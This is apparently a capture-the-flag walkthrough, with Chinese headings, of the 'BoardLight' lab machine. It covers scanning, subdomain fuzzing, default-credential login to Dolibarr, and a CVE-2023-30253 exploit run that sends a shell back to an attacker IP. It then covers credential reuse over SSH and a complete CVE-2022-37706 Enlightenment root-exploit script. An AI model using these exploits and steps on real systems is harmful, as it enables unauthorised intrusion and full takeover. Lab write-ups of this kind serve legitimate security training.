信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.11.11 | TCP:22,80 |
$ nmap -p- 10.10.11.11 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8221/tcp filtered unknown
9564/tcp filtered unknown
19285/tcp filtered unknown
19837/tcp filtered unknown
20734/tcp filtered unknown
24875/tcp filtered unknown
26918/tcp filtered unknown
36270/tcp filtered unknown
36538/tcp filtered unknown
38225/tcp filtered unknown
40483/tcp filtered unknown
53279/tcp filtered unknown
56489/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTTP && 子域名挖掘
$ whatweb 10.10.11.11
# sudo echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts
$ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://board.htb -H "Host: FUZZ.board.htb" -fs 15949
# sudo echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts
http://crm.board.htb/
username:admin password:admin
https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
$ python3 exp.py http://crm.board.htb admin admin 10.10.16.24 10032
www-data@boardlight:~/html$ cat ./crm.board.htb/htdocs/conf/conf.php
username:dolibarrowner
password:serverfun2$2023!!
$ ssh larissa@10.10.11.11
User.txt
b7f82dc5b4ed058a7ea007f02cafde10
权限提升
larissa@boardlight:/tmp$ find / -perm -4000 -type f 2>/dev/null
https://www.exploit-db.com/exploits/51180
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
larissa@boardlight:/tmp$ chmod +x exp.sh
larissa@boardlight:/tmp$ bash exp.sh
Root.txt
f1844b04972e657f7e59544e69e23c20
